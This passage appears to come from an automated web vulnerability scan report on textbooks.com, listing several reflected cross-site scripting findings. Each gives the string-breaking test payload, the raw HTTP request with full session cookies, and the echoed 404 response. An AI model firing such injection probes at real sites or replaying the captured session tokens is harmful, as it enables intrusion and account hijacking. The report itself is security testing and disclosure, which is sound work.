Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3628
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:55 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
et() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/s_code.js72fc8';c42524fe374'

</script>
...[SNIP]...

1.69. http://www.textbooks.com/js/tbcart-ajax.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/tbcart-ajax.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff933'%3be319b3b570d was submitted in the REST URL parameter 1. This input was echoed as ff933';e319b3b570d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsff933'%3be319b3b570d/tbcart-ajax.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3633
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:58 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/jsff933';e319b3b570d/tbcart-ajax.js'

</script>
...[SNIP]...

1.70. http://www.textbooks.com/js/tbcart-ajax.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/tbcart-ajax.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54789'%3babbad13b111 was submitted in the REST URL parameter 2. This input was echoed as 54789';abbad13b111 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/tbcart-ajax.js54789'%3babbad13b111 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3633
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:59 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
{
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/tbcart-ajax.js54789';abbad13b111'

</script>
...[SNIP]...

1.71. http://www.textbooks.com/modcss.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /modcss.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 352f6'%3bb7156053910 was submitted in the REST URL parameter 1. This input was echoed as 352f6';b7156053910 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modcss.php352f6'%3bb7156053910 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:58 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/modcss.php352f6';b7156053910'

</script>
...[SNIP]...

1.72. http://www.textbooks.com/rent-textbooks.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /rent-textbooks.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76455'%3b42f8bd74e39 was submitted in the REST URL parameter 1. This input was echoed as 76455';42f8bd74e39 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rent-textbooks.php76455'%3b42f8bd74e39 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3634
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:10 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...

   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/rent-textbooks.php76455';42f8bd74e39'

</script>
...[SNIP]...

1.73. http://www.textbooks.com/sell-textbooks.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /sell-textbooks.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e49f'%3bd13ee3e3ada was submitted in the REST URL parameter 1. This input was echoed as 1e49f';d13ee3e3ada in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sell-textbooks.php1e49f'%3bd13ee3e3ada HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3634
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:11 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...

   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/sell-textbooks.php1e49f';d13ee3e3ada'

</script>
...[SNIP]...

1.74. http://www.textbooks.com/used-textbooks.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /used-textbooks.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3cf2c'%3b2d1207acd60 was submitted in the REST URL parameter 1. This input was echoed as 3cf2c';2d1207acd60 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /used-textbooks.php3cf2c'%3b2d1207acd60 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
